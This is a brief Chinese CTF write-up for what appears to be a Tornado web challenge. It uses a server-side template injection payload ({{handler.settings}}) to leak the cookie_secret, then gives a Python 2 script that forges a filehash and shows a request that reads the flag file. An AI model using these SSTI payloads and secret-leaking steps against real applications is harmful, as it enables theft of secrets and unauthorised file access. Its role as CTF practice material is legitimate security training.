存在render函数渲染
需要知道cookie_secret
首先访问/fllllllllllllag
显示error?msg=Error,猜测服务端模板存在注入攻击(SSTI)
尝试验证/error?msg={{datetime}}
再构造payload获取cookie_secret:
/error?msg={{handler.settings}}
'cookie_secret': 'b94dd73c-a043-429c-9725-33525b0c2c3f'
计算filehash值,python2脚本如下
# -*- coding: UTF-8 -*-
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = 'b94dd73c-a043-429c-9725-33525b0c2c3f'
print(md5(cookie_secret+md5(filename)))
if __name__ == '__main__':
filehash()
payload:file?filename=/fllllllllllllag&filehash=98b9cc951e0ba6127178cabbbe904517
flag{fa3723e4-77f8-42a5-b358-efdb7bfd2230}